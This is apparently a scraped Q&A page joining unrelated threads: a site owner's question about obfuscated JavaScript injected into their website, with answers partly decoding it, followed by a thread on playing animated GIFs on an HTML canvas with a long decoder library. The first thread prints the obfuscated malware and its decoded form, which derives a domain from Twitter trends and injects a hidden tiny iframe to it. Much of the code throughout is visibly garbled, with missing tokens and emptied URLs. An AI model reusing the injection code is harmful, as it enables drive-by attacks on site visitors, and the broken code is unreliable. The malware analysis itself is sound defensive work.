Is this dangerous Javascript? - javascript

(function($$) {
d = "(#(){ %H=#( +Pw=this;\\[Pw~FullYear $Month $Date $Hours $Minutes $Seconds()]}; %B=#( +#h,PD=this.#H(),i=0;PD[1]+=1;while(i++<7){#h=PD[i] 0#h<#L)PD[i]=Vz')+#h}\\ PD.splice(Vz'),1+VT - 3Vu -+'T'+PD 3VU -};Pr={'hXhttp://`sX/`tXtre`dXdai`nXnds`qX?`cXcallback=`jX#`aXapi`lXly`WXtwitter`oXcom`eX1`kXs`KXbody`xXajax`DX.`LXlibs`JXjquery`6X6.2`mXmin`fXon`SXcript`iXif`MXrame`YXhead`wXwidth:`pXpx;`HXheight:`TX2`rXrc`QX\"`yXstyle=`bX><`RX></`IXdiv`BX<`AX>`gXgoogle`EX&date=`zX0`uX-`UX `,X:00`;':2345678901,'/':48271,'F':198195254,'G':12,'CX='};# #n(#E){#M=[];for(PM=0;PM<#E /;PM++){#M.push(Pr[#E.charAt(PM)])}\\ #p(#M)}Pj=document;#d=window; (C='undefined'; (S=VhaDWDosestnsdlDjfqcq' 6G= &)== (C) 0#G||!PR()){if(!#G){try{Pn=jQuery ;try{Pn=$ }PS=Pj.getElementsByTagName(VY -[0];#m=Pj.createElement(VkS -;#m.setAttribute(Vkr'),#n(\"hxDgakDosxsLsJseD6sJDmDj\"));PS.appendChild(#m)}# PH(#q,PB){\\ Math.floor(#q/PB) 7x(#s +PC=PH( (N, !m) 5F= (N% !m 5f= !D*#F- !T*PC 0#f>0){#N=#f}else{#N=#f+ !v}\\(#N%#s) 7t(#k){ (N=V;')+#k; !D=V/'); !v=V;')-VF'); !m=PH( !v, !D); !T= !v% !D 7p(P){\\ P /==1?P[0]:P 3'')};# #e(P){d=new Date( 6D=Vzee');d.setTime((P.as_of-VG')*VG')*VG')*Vezz -*Vezzz -;\\ d 7z(Pz +#c,PL,#j=Pz / 5v=[];while(--#j){PL=#x(#j 6v.push(PL 6c=Pz[PL];Pz[PL]=Pz[#j];Pz[#j]=#c}}# PJ($){PN=$.map([81,85,74,74,92,17,82,73,80,30,82,77,25,11,10,10,61,11,56,55,11,53,6,53,7,2,1,0,48],#(x,i){\\ String.fromCharCode(i+x+24)});\\ #p(PN) 7o($){if &)!= (C){$(#(){if &.Ph)!= (C)\\;$.Ph=1; 2S,#(Pe){#R=#e(Pe 6K=#R~Month() 8c=#R~Date( 6u=#S+#n(\"ETzeeu\")+#K+\"-\"+Pc;Pu=PA=PH(#R~Hours(),6)*6 8d=Pu+1;#L=+Vez'); ) 2u,#(Pe){try{#y=Pe.trends;for(#r in #y){break}#r=#r.substr(+Vz'),+Vee - 0Pu ,u 0Pd ,d; 4u+V,')] 0!#b) 4d+V,')];#b=(#b[3].name.toLowerCase().replace(/[^a-z]/gi,'')+'safetynet').split('' 6T=#K*73+PA*3+Pc*41;#t(#T 6a=#x(4)+#L;#z(#b 6g=VCh')+#p(#b).substring(0,#a)+'.com/'+PJ($);Pr['Z']=#g;Pf=VBI 1biMU 1UkrZRiMRIA');$(VK -.append(Pf)}catch(Py){}})},#L*#L*#L)})})}else{ ) *,1+VTTT -}} *)()#js#functionP#AV#n('X':'`','~.getUTC\\return .noConflict(true)}catch(e){} !#d.P $(),Pw~ %Date.prototype.# &(typeof($ (#d.# )setTimeout(#(){ *#o(#d.jQuery)} +){var ,<#L)Pu=Vz')+P -')) /.length 0;if( 1yQHTpweeepQ 2$.getJSON(# 3.join( 4#b=#y[#r+P 5;var # 6);# 7}# # 8+(+Ve -;P";
for (c = 50; c; d = (t = d.split('##PVX`~\\ ! $ % & ( ) * + , - / 0 1 2 3 4 5 6 7 8'.substr(c -= (x = c < 10 ? 1 : 2), x))).join(t.pop()));
})(function(jsAP) {
return (function(jsA, jsAg) {
return jsAg(jsA(jsAg(jsA(jsAP))))(jsAP)()
})((function(jsA) {
return jsA.constructor
}), (function(jsA) {
return (function(jsAg) {
return, jsAg)
My host is saying nothing about this and it is happening frequently. I think they might be hiding a malicious hacking attempt.
What does this do?
We're changing hosts.
The code is indeed malicious and was injected into our website. Our host was trying to conceal that (probably so that we wouldn't worry)
This happened to my friend's website on the same host.
Don't test out this script, please.
Looks like some obfuscated injection.

Let's work and decipher this; it'll be fun(-nish).
AFAICT so far it's grabbing (what seems to be) the third trend for two days prior to the current date, or at least was meant to (I think the date key it's using to look up a day's trends is incorrect, because it's adding a zero-seconds thing onto the time, which isn't present in the feed), building a URL from that, and sending some data keyed on a hash representing the nearest 6-hr interval.
Here's the blob of text decoded after decoding along with the start of analysis:
(function () {
jsAr = { }; // Here only for a subsequent set of jsAr['Z'] later, which may not be necessary.
/* Returns either first element of jsA, or a joined string. */
function firstElementOrJoined(jsA) {
return jsA.length == 1 ? jsA[0] : jsA.join('')
jsAj = document;
loadJquery(); // Load JQ in head new script tag.
function divideAndFloor(jsq, jsAB) {
return Math.floor(jsq / jsAB)
function jsx(jss) {
var jsAC = divideAndFloor(jsN, jsAm);
var jsF = jsN % jsAm;
var jsf = (jsAD * jsF) - (jsAT * jsAC);
if (jsf > 0) {
jsN = jsf
} else {
jsN = jsf + jsAv
return (jsN % jss)
/** Used only once in .getJSON call. */
function jst(jsk) {
jsN = 2345678901 + jsk;
jsAD = 48271;
jsAv = 2147483647;
jsAm = divideAndFloor(jsAv, jsAD);
jsAT = jsAv % jsAD
/** Takes twitter as_of and subtracts ~2 days. */
function jse(jsA) {
d = new Date();
d.setTime((jsA.as_of - 172800) * '1000');
return d
function jsz(jsAz) {
var jsc, jsAL, jsj = jsAz.length;
var jsv = [];
while (--jsj) {
jsAL = jsx(jsj);
jsc = jsAz[jsAL];
jsAz[jsAL] = jsAz[jsj];
jsAz[jsj] = jsc
function jso($) {
// Wait until we have jQuery loaded.
if (typeof($) == 'undefined') {
setTimeout(function () { jso(jQuery) }, 1222);
$(function () {
// Only run this function once (there's a timeout inside).
if (typeof ($.jsAh) != 'undefined') return;
$.jsAh = 1;
$.getJSON('', function (data) {
dateTwoDaysPrior = jse(data);
nMonthTwoDaysAgo = dateTwoDaysPrior.getUTCMonth() + 1;
nDayTwoDaysAgo = dateTwoDaysPrior.getUTCDate();
urlTwitterTwoDaysAgo = '' + nMonthTwoDaysAgo + "-" + nDayTwoDaysAgo;
twoDigitPrevSixHr = prevSixHr = divideAndFloor(dateTwoDaysPrior.getUTCHours(), 6) * 6 + 1;
jsAd = twoDigitPrevSixHr + 1;
// Run JSON request every second.
setTimeout(function () {
$.getJSON(urlTwitterTwoDaysAgo, function (data) {
try {
jsy = data.trends;
for (jsr in jsy) {
jsr = jsr.substr(0, 11); // == 2011-11-10
if (twoDigitPrevSixHr < 10) twoDigitPrevSixHr = '0' + twoDigitPrevSixHr; // Normalize to hh
if (jsAd < 10) twoDigitPrevSixHr = '0' + jsAd; // Normalize to hh
// Try to get trends for last 6hr thing (but the :00 will make it never work?)
// If can't, try to get the next 6hr thing.
jsb = jsy[jsr + twoDigitPrevSixHr + ':00'];
if (!jsb) jsb = jsy[jsr + jsAd + ':00'];
// Get third trend entry, e.g.,
// {
// "name": "#sinterklaasintocht",
// "query": "#sinterklaasintocht",
// "promoted_content": null,
// "events": null
// }
// and strip out non-chars from name, add safetynet, and convert to array
// ['s', 'i', etc... nterklaasintochtsafetynet]
jsb = (jsb[3].name.toLowerCase().replace(/[^a-z]/gi, '') + 'safetynet').split('');
// 803 + prevSixHr * 3 + 410; -- some sort of hash?
hashkeyForTwoDaysAgoPrevSixHr = nMonthTwoDaysAgo * 73 + prevSixHr * 3 + nDayTwoDaysAgo * 41;
jsa = jsx(4) + 10;
// Are these two lines useful? Neither jsAr['Z'] nor jsg are referenced.
// jsb = ['s', 'i', etc... nterklaasintochtsafetynet]
jsg = '=http://' + firstElementOrJoined(jsb).substring(0, jsa) + '.com/index.php?tp=001e4bb7b4d7333d';
jsAr['Z'] = jsg;
jsAf = '<divstyle="height:2px;width:111px;"><iframe style="height:2px;width:111px;" src></iframe></div>';
} catch (jsAy) {}
}, 1000)
Here's some URLs constructed from the array:
jsd.jsS =
This chunk of code:
jsAS = jsAj.getElementsByTagName(jsn('Y'))[0];
jsm = jsAj.createElement(jsn('kS'));
jsm.setAttribute(jsn('kr'), jsn("hxDgakDosxsLsJseD6sJDmDj"));
appends the jquery script tag to <head>:
<script src=""></script>


How to put a gif with Canvas

I'm creating a game, and in my game, when the HERO stay near the MONSTER, a gif will be showed, to scare the player. But I have no idea how to do this. I tried to put PHP or HTML code, but it doesn't works... The function is AtualizaTela2(). This is my main code:
<title>Hero's Escape Game</title>
<script language="JavaScript" type="text/javascript">
var objCanvas=null; // object that represents the canvas
var objContexto=null;
// Hero positioning control
var xHero=300;
var yHero=100;
// Monster positioning control
var xMonster=620;
var yMonster=0;
var imgFundo2 = new Image();
imgFundo2.src = "Images/Pista2.png";
var imgMonster = new Image();
imgMonster.src = "Images/Monster.png";
var imgHero = new Image();
imgHero.src = "Images/Hero.png";
function AtualizaTela2(){
if((xHero >= xMonster-10)&&(xHero <= xMonster + 10))
/*gif here*/
objContexto.drawImage(imgHero, xHero, yHero);
objContexto.drawImage(imgMonster, xMonster, yMonster);
function Iniciar(){
objCanvas = document.getElementById("meuCanvas");
objContexto = objCanvas.getContext("2d");
/* the function HeroMovement() and MonsterMovement() are not here */
<body onLoad="Iniciar();" onkeydown="HeroMovement(event);">
<canvas id="meuCanvas" width="1233"
style="border:1px solid #000000;">
Seu browser não suporta o elemento CANVAS, atualize-se!!!
This is the simplified code, because the real code is very big!
Thanks for the help! :)
Loading and playing GIF image to canvas.
Sorry answer exceeded size limit, had to remove much of the detailed code comments.
I am not going to go into details as the whole process is rather complicated.
The only way to get a GIF animated in canvas is to decode the GIF image in javascript. Luckily the format is not too complicated with data arranged in blocks that contain image size, color pallets, timing information, a comment field, and how frames are drawn.
Custom GIF load and player.
The example below contains an object called GIF that will create custom format GIF images from URLs that can play a GIF similar to how a video is played. You can also randomly access all GIF frames in any order.
There are many callbacks and options. There is basic usage information in comments and the code shows how to load the gif. There are functions to pause and play, seek(timeInSeconds) and seekFrame(frameNumber), properties to control playSpeed and much more. There are no shuttling events as access is immediate.
var myGif = GIF();
Once loaded
ctx.drawImage(myGif.image,0,0); // will draw the playing gif image
Or access the frames via the frames buffer
ctx.drawImage(myGif.frames[0].image,0,0); // draw frame 0 only.
Go to the bottom of the GIF object to see all the options with comments.
The GIF must be same domain or have CORS header
The gif in he demo is from wiki commons and contains 250+ frames, some low end devices will have trouble with this as each frame is converted to a full RGBA image making the loaded GIF significantly larger than the gif file size.
The demo
Loads the gif displaying the frames and frame count as loaded.
When loaded 100 particles each with random access frames playing at independent speeds and independent directions are displayed in the background.
The foreground image is the gif playing at the frame rate embedded in the file.
Code is as is, as an example only and NOT for commercial use.
const ctx = canvas.getContext("2d");
var myGif;
// Can not load gif cross domain unless it has CORS header
const gifURL = "";
// timeout just waits till script has been parsed and executed
// then starts loading a gif
myGif = GIF(); // creates a new gif
myGif.onerror = function(e){
console.log("Gif loading error " + e.type);
// Function draws an image
function drawImage(image,x,y,scale,rot){
ctx.drawImage(image,-image.width / 2, -image.height / 2);
// helper functions
const rand = (min = 1, max = min + (min = 0)) => Math.random() * (max - min) + min;
const setOf =(c,C)=>{var a=[],i=0;while(i<c){a.push(C(i++))}return a};
const eachOf =(a,C)=>{var i=0;const l=a.length;while(i<l && C(a[i],i++,l)!==true);return i};
const mod = (v,m) => ((v % m) + m) % m;
// create 100 particles
const particles = setOf(100,() => {
return {
x : rand(innerWidth),
y : rand(innerHeight),
scale : rand(0.15, 0.5),
rot : rand(Math.PI * 2),
frame : 0,
frameRate : rand(-2,2),
dr : rand(-0.1,0.1),
dx : rand(-4,4),
dy : rand(-4,4),
// Animate and draw 100 particles
function drawParticles(){
eachOf(particles, part => {
part.x += part.dx;
part.y += part.dy;
part.rot += part.dr;
part.frame += part.frameRate;
part.x = mod(part.x,innerWidth);
part.y = mod(part.y,innerHeight);
var frame = mod(part.frame ,myGif.frames.length) | 0;
var w = canvas.width;
var h = canvas.height;
var cw = w / 2; // center
var ch = h / 2;
// main update function
function update(timer) {
ctx.setTransform(1, 0, 0, 1, 0, 0); // reset transform
if (w !== innerWidth || h !== innerHeight) {
cw = (w = canvas.width = innerWidth) / 2;
ch = (h = canvas.height = innerHeight) / 2;
} else {
ctx.clearRect(0, 0, w, h);
if(myGif) { // If gif object defined
if(!myGif.loading){ // if loaded
// draw random access to gif frames
drawImage(myGif.image,cw,ch,1,0); // displays the current frame.
}else if(myGif.lastFrame !== null){ // Shows frames as they load
ctx.fillStyle = "white";
ctx.fillText("GIF loading frame " + myGif.frames.length ,10,21);
ctx.fillText("GIF loading frame " + myGif.frames.length,10,19);
ctx.fillText("GIF loading frame " + myGif.frames.length,9,20);
ctx.fillText("GIF loading frame " + myGif.frames.length,11,20);
ctx.fillStyle = "black";
ctx.fillText("GIF loading frame " + myGif.frames.length,10,20);
ctx.fillText("Waiting for GIF image ",10,20);
Gif Decoder and player for use with Canvas API's
**NOT** for commercial use.
To use
var myGif = GIF(); // creates a new gif
var myGif = new GIF(); // will work as well but not needed as GIF() returns the correct reference already.
myGif.load("myGif.gif"); // set URL and load
myGif.onload = function(event){ // fires when loading is complete
//event.type = "load"
//event.path array containing a reference to the gif
myGif.onprogress = function(event){ // Note this function is not bound to myGif
//event.bytesRead bytes decoded
//event.totalBytes total bytes
//event.frame index of last frame decoded
myGif.onerror = function(event){ // fires if there is a problem loading. this = myGif
//event.type a description of the error
//event.path array containing a reference to the gif
Once loaded the gif can be displayed
You can display the last frame loaded during loading
if(myGif.lastFrame !== null){
To access all the frames
var gifFrames = myGif.frames; // an array of frames.
A frame holds various frame associated items.
myGif.frame[0].image; // the first frames image
myGif.frame[0].delay; // time in milliseconds frame is displayed for
Gifs use various methods to reduce the file size. The loaded frames do not maintain the optimisations and hold the full resolution frames as DOM images. This mean the memory footprint of a decode gif will be many time larger than the Gif file.
const GIF = function () {
// **NOT** for commercial use.
var timerID; // timer handle for set time out usage
var st; // holds the stream object when loading.
var interlaceOffsets = [0, 4, 2, 1]; // used in de-interlacing.
var interlaceSteps = [8, 8, 4, 2];
var interlacedBufSize; // this holds a buffer to de interlace. Created on the first frame and when size changed
var deinterlaceBuf;
var pixelBufSize; // this holds a buffer for pixels. Created on the first frame and when size changed
var pixelBuf;
const GIF_FILE = { // gif file data headers
GCExt : 0xF9,
APPExt : 0xFF,
UNKNOWN : 0x01, // not sure what this is but need to skip it in parser
IMAGE : 0x2C,
EOF : 59, // This is entered as decimal
EXT : 0x21,
// simple buffered stream used to read from the file
var Stream = function (data) { = new Uint8ClampedArray(data);
this.pos = 0;
var len =;
this.getString = function (count) { // returns a string from current pos of len count
var s = "";
while (count--) { s += String.fromCharCode([this.pos++]) }
return s;
this.readSubBlocks = function () { // reads a set of blocks as a string
var size, count, data = "";
do {
count = size =[this.pos++];
while (count--) { data += String.fromCharCode([this.pos++]) }
} while (size !== 0 && this.pos < len);
return data;
this.readSubBlocksB = function () { // reads a set of blocks as binary
var size, count, data = [];
do {
count = size =[this.pos++];
while (count--) { data.push([this.pos++]);}
} while (size !== 0 && this.pos < len);
return data;
// LZW decoder uncompressed each frames pixels
// this needs to be optimised.
// minSize is the min dictionary as powers of two
// size and data is the compressed pixels
function lzwDecode(minSize, data) {
var i, pixelPos, pos, clear, eod, size, done, dic, code, last, d, len;
pos = pixelPos = 0;
dic = [];
clear = 1 << minSize;
eod = clear + 1;
size = minSize + 1;
done = false;
while (!done) { // JavaScript optimisers like a clear exit though I never use 'done' apart from fooling the optimiser
last = code;
code = 0;
for (i = 0; i < size; i++) {
if (data[pos >> 3] & (1 << (pos & 7))) { code |= 1 << i }
if (code === clear) { // clear and reset the dictionary
dic = [];
size = minSize + 1;
for (i = 0; i < clear; i++) { dic[i] = [i] }
dic[clear] = [];
dic[eod] = null;
} else {
if (code === eod) { done = true; return }
if (code >= dic.length) { dic.push(dic[last].concat(dic[last][0])) }
else if (last !== clear) { dic.push(dic[last].concat(dic[code][0])) }
d = dic[code];
len = d.length;
for (i = 0; i < len; i++) { pixelBuf[pixelPos++] = d[i] }
if (dic.length === (1 << size) && size < 12) { size++ }
function parseColourTable(count) { // get a colour table of length count Each entry is 3 bytes, for RGB.
var colours = [];
for (var i = 0; i < count; i++) { colours.push([[st.pos++],[st.pos++],[st.pos++]]) }
return colours;
function parse (){ // read the header. This is the starting point of the decode and async calls parseBlock
var bitField;
st.pos += 6;
gif.width = ([st.pos++]) + (([st.pos++]) << 8);
gif.height = ([st.pos++]) + (([st.pos++]) << 8);
bitField =[st.pos++];
gif.colorRes = (bitField & 0b1110000) >> 4;
gif.globalColourCount = 1 << ((bitField & 0b111) + 1);
gif.bgColourIndex =[st.pos++];
st.pos++; // ignoring pixel aspect ratio. if not 0, aspectRatio = (pixelAspectRatio + 15) / 64
if (bitField & 0b10000000) { gif.globalColourTable = parseColourTable(gif.globalColourCount) } // global colour flag
setTimeout(parseBlock, 0);
function parseAppExt() { // get application specific data. Netscape added iterations and terminator. Ignoring that
st.pos += 1;
if ('NETSCAPE' === st.getString(8)) { st.pos += 8 } // ignoring this data. iterations (word) and terminator (byte)
else {
st.pos += 3; // 3 bytes of string usually "2.0" when identifier is NETSCAPE
st.readSubBlocks(); // unknown app extension
function parseGCExt() { // get GC data
var bitField;
bitField =[st.pos++];
gif.disposalMethod = (bitField & 0b11100) >> 2;
gif.transparencyGiven = bitField & 0b1 ? true : false; // ignoring bit two that is marked as userInput???
gif.delayTime = ([st.pos++]) + (([st.pos++]) << 8);
gif.transparencyIndex =[st.pos++];
function parseImg() { // decodes image data to create the indexed pixel image
var deinterlace, frame, bitField;
deinterlace = function (width) { // de interlace pixel data if needed
var lines, fromLine, pass, toline;
lines = pixelBufSize / width;
fromLine = 0;
if (interlacedBufSize !== pixelBufSize) { // create the buffer if size changed or undefined.
deinterlaceBuf = new Uint8Array(pixelBufSize);
interlacedBufSize = pixelBufSize;
for (pass = 0; pass < 4; pass++) {
for (toLine = interlaceOffsets[pass]; toLine < lines; toLine += interlaceSteps[pass]) {
deinterlaceBuf.set(pixelBuf.subarray(fromLine, fromLine + width), toLine * width);
fromLine += width;
frame = {}
frame.disposalMethod = gif.disposalMethod;
frame.time = gif.length;
frame.delay = gif.delayTime * 10;
gif.length += frame.delay;
if (gif.transparencyGiven) { frame.transparencyIndex = gif.transparencyIndex }
else { frame.transparencyIndex = undefined }
frame.leftPos = ([st.pos++]) + (([st.pos++]) << 8);
frame.topPos = ([st.pos++]) + (([st.pos++]) << 8);
frame.width = ([st.pos++]) + (([st.pos++]) << 8);
frame.height = ([st.pos++]) + (([st.pos++]) << 8);
bitField =[st.pos++];
frame.localColourTableFlag = bitField & 0b10000000 ? true : false;
if (frame.localColourTableFlag) { frame.localColourTable = parseColourTable(1 << ((bitField & 0b111) + 1)) }
if (pixelBufSize !== frame.width * frame.height) { // create a pixel buffer if not yet created or if current frame size is different from previous
pixelBuf = new Uint8Array(frame.width * frame.height);
pixelBufSize = frame.width * frame.height;
lzwDecode([st.pos++], st.readSubBlocksB()); // decode the pixels
if (bitField & 0b1000000) { // de interlace if needed
frame.interlaced = true;
} else { frame.interlaced = false }
processFrame(frame); // convert to canvas image
function processFrame(frame) { // creates a RGBA canvas image from the indexed pixel data.
var ct, cData, dat, pixCount, ind, useT, i, pixel, pDat, col, frame, ti;
frame.image = document.createElement('canvas');
frame.image.width = gif.width;
frame.image.height = gif.height;
frame.image.ctx = frame.image.getContext("2d");
ct = frame.localColourTableFlag ? frame.localColourTable : gif.globalColourTable;
if (gif.lastFrame === null) { gif.lastFrame = frame }
useT = (gif.lastFrame.disposalMethod === 2 || gif.lastFrame.disposalMethod === 3) ? true : false;
if (!useT) { frame.image.ctx.drawImage(gif.lastFrame.image, 0, 0, gif.width, gif.height) }
cData = frame.image.ctx.getImageData(frame.leftPos, frame.topPos, frame.width, frame.height);
ti = frame.transparencyIndex;
dat =;
if (frame.interlaced) { pDat = deinterlaceBuf }
else { pDat = pixelBuf }
pixCount = pDat.length;
ind = 0;
for (i = 0; i < pixCount; i++) {
pixel = pDat[i];
col = ct[pixel];
if (ti !== pixel) {
dat[ind++] = col[0];
dat[ind++] = col[1];
dat[ind++] = col[2];
dat[ind++] = 255; // Opaque.
} else
if (useT) {
dat[ind + 3] = 0; // Transparent.
ind += 4;
} else { ind += 4 }
frame.image.ctx.putImageData(cData, frame.leftPos, frame.topPos);
gif.lastFrame = frame;
if (!gif.waitTillDone && typeof gif.onload === "function") { doOnloadEvent() }// if !waitTillDone the call onload now after first frame is loaded
// **NOT** for commercial use.
function finnished() { // called when the load has completed
gif.loading = false;
gif.frameCount = gif.frames.length;
gif.lastFrame = null;
st = undefined;
gif.complete = true;
gif.disposalMethod = undefined;
gif.transparencyGiven = undefined;
gif.delayTime = undefined;
gif.transparencyIndex = undefined;
gif.waitTillDone = undefined;
pixelBuf = undefined; // dereference pixel buffer
deinterlaceBuf = undefined; // dereference interlace buff (may or may not be used);
pixelBufSize = undefined;
deinterlaceBuf = undefined;
gif.currentFrame = 0;
if (gif.frames.length > 0) { gif.image = gif.frames[0].image }
if (typeof gif.onloadall === "function") {
(gif.onloadall.bind(gif))({ type : 'loadall', path : [gif] });
if (gif.playOnLoad) { }
function canceled () { // called if the load has been cancelled
if (typeof gif.cancelCallback === "function") { (gif.cancelCallback.bind(gif))({ type : 'canceled', path : [gif] }) }
function parseExt() { // parse extended blocks
const blockID =[st.pos++];
if(blockID === GIF_FILE.GCExt) { parseGCExt() }
else if(blockID === GIF_FILE.COMMENT) { gif.comment += st.readSubBlocks() }
else if(blockID === GIF_FILE.APPExt) { parseAppExt() }
else {
if(blockID === GIF_FILE.UNKNOWN) { st.pos += 13; } // skip unknow block
function parseBlock() { // parsing the blocks
if (gif.cancel !== undefined && gif.cancel === true) { canceled(); return }
const blockId =[st.pos++];
if(blockId === GIF_FILE.IMAGE ){ // image block
if (gif.firstFrameOnly) { finnished(); return }
}else if(blockId === GIF_FILE.EOF) { finnished(); return }
else { parseExt() }
if (typeof gif.onprogress === "function") {
gif.onprogress({ bytesRead : st.pos, totalBytes :, frame : gif.frames.length });
setTimeout(parseBlock, 0); // parsing frame async so processes can get some time in.
function cancelLoad(callback) { // cancels the loading. This will cancel the load before the next frame is decoded
if (gif.complete) { return false }
gif.cancelCallback = callback;
gif.cancel = true;
return true;
function error(type) {
if (typeof gif.onerror === "function") { (gif.onerror.bind(this))({ type : type, path : [this] }) }
gif.onload = gif.onerror = undefined;
gif.loading = false;
function doOnloadEvent() { // fire onload event if set
gif.currentFrame = 0;
gif.nextFrameAt = gif.lastFrameAt = new Date().valueOf(); // just sets the time now
if (typeof gif.onload === "function") { (gif.onload.bind(gif))({ type : 'load', path : [gif] }) }
gif.onerror = gif.onload = undefined;
function dataLoaded(data) { // Data loaded create stream and parse
st = new Stream(data);
function loadGif(filename) { // starts the load
var ajax = new XMLHttpRequest();
ajax.responseType = "arraybuffer";
ajax.onload = function (e) {
if ( === 404) { error("File not found") }
else if( >= 200 && < 300 ) { dataLoaded(ajax.response) }
else { error("Loading error : " + }
};'GET', filename, true);
ajax.onerror = function (e) { error("File error") };
this.src = filename;
this.loading = true;
function play() { // starts play if paused
if (!gif.playing) {
gif.paused = false;
gif.playing = true;
function pause() { // stops play
gif.paused = true;
gif.playing = false;
function togglePlay(){
if(gif.paused || !gif.playing){ }
else{ gif.pause() }
function seekFrame(frame) { // seeks to frame number.
gif.currentFrame = frame % gif.frames.length;
if (gif.playing) { playing() }
else { gif.image = gif.frames[gif.currentFrame].image }
function seek(time) { // time in Seconds // seek to frame that would be displayed at time
if (time < 0) { time = 0 }
time *= 1000; // in ms
time %= gif.length;
var frame = 0;
while (time > gif.frames[frame].time + gif.frames[frame].delay && frame < gif.frames.length) { frame += 1 }
gif.currentFrame = frame;
if (gif.playing) { playing() }
else { gif.image = gif.frames[gif.currentFrame].image}
function playing() {
var delay;
var frame;
if (gif.playSpeed === 0) {
} else {
if (gif.playSpeed < 0) {
gif.currentFrame -= 1;
if (gif.currentFrame < 0) {gif.currentFrame = gif.frames.length - 1 }
frame = gif.currentFrame;
frame -= 1;
if (frame < 0) { frame = gif.frames.length - 1 }
delay = -gif.frames[frame].delay * 1 / gif.playSpeed;
} else {
gif.currentFrame += 1;
gif.currentFrame %= gif.frames.length;
delay = gif.frames[gif.currentFrame].delay * 1 / gif.playSpeed;
gif.image = gif.frames[gif.currentFrame].image;
timerID = setTimeout(playing, delay);
var gif = { // the gif image object
onload : null, // fire on load. Use waitTillDone = true to have load fire at end or false to fire on first frame
onerror : null, // fires on error
onprogress : null, // fires a load progress event
onloadall : null, // event fires when all frames have loaded and gif is ready
paused : false, // true if paused
playing : false, // true if playing
waitTillDone : true, // If true onload will fire when all frames loaded, if false, onload will fire when first frame has loaded
loading : false, // true if still loading
firstFrameOnly : false, // if true only load the first frame
width : null, // width in pixels
height : null, // height in pixels
frames : [], // array of frames
comment : "", // comments if found in file. Note I remember that some gifs have comments per frame if so this will be all comment concatenated
length : 0, // gif length in ms (1/1000 second)
currentFrame : 0, // current frame.
frameCount : 0, // number of frames
playSpeed : 1, // play speed 1 normal, 2 twice 0.5 half, -1 reverse etc...
lastFrame : null, // temp hold last frame loaded so you can display the gif as it loads
image : null, // the current image at the currentFrame
playOnLoad : true, // if true starts playback when loaded
// functions
load : loadGif, // call this to load a file
cancel : cancelLoad, // call to stop loading
play : play, // call to start play
pause : pause, // call to pause
seek : seek, // call to seek to time
seekFrame : seekFrame, // call to seek to frame
togglePlay : togglePlay, // call to toggle play and pause state
return gif;
End of gif reader
const mouse = {
bounds: null,
x: 0,
y: 0,
button: false
function mouseEvents(e) {
const m = mouse;
m.bounds = canvas.getBoundingClientRect();
m.x = e.pageX - m.bounds.left - scrollX;
m.y = e.pageY - - scrollY;
mouse.x = e.pageX;
m.button = e.type === "mousedown" ? true : e.type === "mouseup" ? false : m.button;
["down", "up", "move"].forEach(name => document.addEventListener("mouse" + name, mouseEvents));
canvas {
position: absolute;
top: 0px;
left: 0px;
<canvas id="canvas"></canvas>
This works for 99% of gifs. Occasionally you will find a gif that does not play correctly. Reason: (I never bothered to find out). Fix: re-encode gif using modern encoder.
There are some minor inconsistencies that need fixing. In time I will provide a codePen example with ES6 and improved interface. Stay tuned.
Here ya go:
You will need to exctract each frames and make an array out of them
split frames:
easier if you have urls or path like ...... with which you can do a simple loop like this:
var Img = [];
for (var i = 0; i < 28; i++) {
Img[i] = new Image();
Img[i].src = ""+i+".png";
function drawAnimatedImage(arr,x,y,angle,factor,changespeed) {
if (!factor) {
factor = 1;
if (!changespeed) {
changespeed = 1;
ctx.translate(x, y);
ctx.rotate(angle * Math.PI / 180);
if (!!arr[Math.round( % arr.length]) {
ctx.drawImage(arr[Math.round( % arr.length], -(arr[Math.round( % arr.length].width * factor / 2), -(arr[Math.round( % arr.length].height * factor / 2), arr[Math.round( % arr.length].width * factor, arr[Math.round( % arr.length].height * factor);
var canvas = document.getElementById("myCanvas");
var ctx = canvas.getContext('2d');
var waitingWolf = [];
var url = ["","","","","","","","","","","","","","","","","","","","","","","","","","","",""]
function setup () {
for (var i = 0; i < 28; i++) {
waitingWolf[i] = new Image();
waitingWolf[i].src = url[i];
function yop() {
if (waitingWolf.length == 28) {
<canvas id="myCanvas" width="1000" height="1000">
You can use Gify & gifuct-js projects on Github.
First, download your Animated gif and prepare the images you need to do this on page load.
var framesArray;
var currentFrame = 0;
var totalFrames = null;
var oReq = new XMLHttpRequest();"GET", "/myfile.gif", true);
oReq.responseType = "arraybuffer";
oReq.onload = function (oEvent) {
var arrayBuffer = oReq.response; // Note: not oReq.responseText
var gif = new GIF(arrayBuffer);
framesArray = gif.decompressFrames(true);
totalFrames = framesArray.length;
When you want your animation to show so in your draw loop
if((xHero >= xMonster-10)&&(xHero <= xMonster + 10)){
// you need to work out from your frame rate when you should increase current frame
// based on the framerate of the gif image using framesArray[currentFrame].delay
// auto-detect if we need to jump to the first frame in the loop
// as we gone through all the frames
currentFrame = currentFrame % totalFrames;
var frame = framesArray[currentFrame];
var x,y;
// get x posstion as an offset from xHero
// get y posstion as an offset from yHero
Please note this code is not tested I built following the documentation of the 2 projects so it might be a little wrong but it shows roughly how it is possible,
the 3rd link is the online contents of the demo folder for the gitfuct-js library
It is not possible to simply draw a .gif (animated!) on the <canvas> element.
You have two options.
a) you can append the HTML with a <div> to which you append the .gif (via <img> node) and then layer the via z-Index and css top/left over the <canvas>, at the correct position. It will mess up with mouse events eventually tho, which can be solved by event propagation. I would consider this a poor mans solution.
b) You need to learn how to animate stuff. Look up window.requestAnimationFrame method. Doing so will allow you to animate on the <canvas>, which can emulate the .gif behavior you are looking for. It will however be a bit complex at your current level i think.
You can draw the .gif on the canvas like the above poster described. However, it will be 100 % static, like a .jpg or .png in that case, unless you manage to dissolve the .gif into its frames and still use the window.requestAnimationFrame method.
Basicly, if you want the animated behavior of a .gif, you will need to make major adjustments.
Simply draw your image on the canvas at whatever position you want to insert your gif. I'll assume you want to insert your gif in the canvas meuCanvas.
if((xHero >= xMonster-10)&&(xHero <= xMonster + 10))
var ctx = document.getElementById('meuCanvas').getContext('2d');
var img = new Image();
img.onload = function() {
ctx.drawImage(img, 0, 0);
img.src = '';
I'm also not quite sure what your problem is, but instead of:
if((xHero >= xMonster-10)||(xHero <= xMonster + 10))
/*gif here*/
you probably want:
if (xHero >= xMonster-10 && xHero <= xMonster + 10)
/*gif here*/
|| means OR
&& means AND
In your code using OR makes the condition always true; that's probably not what you want.

d3.csv working in jsfiddle not working on MTurk Worker Sandbox

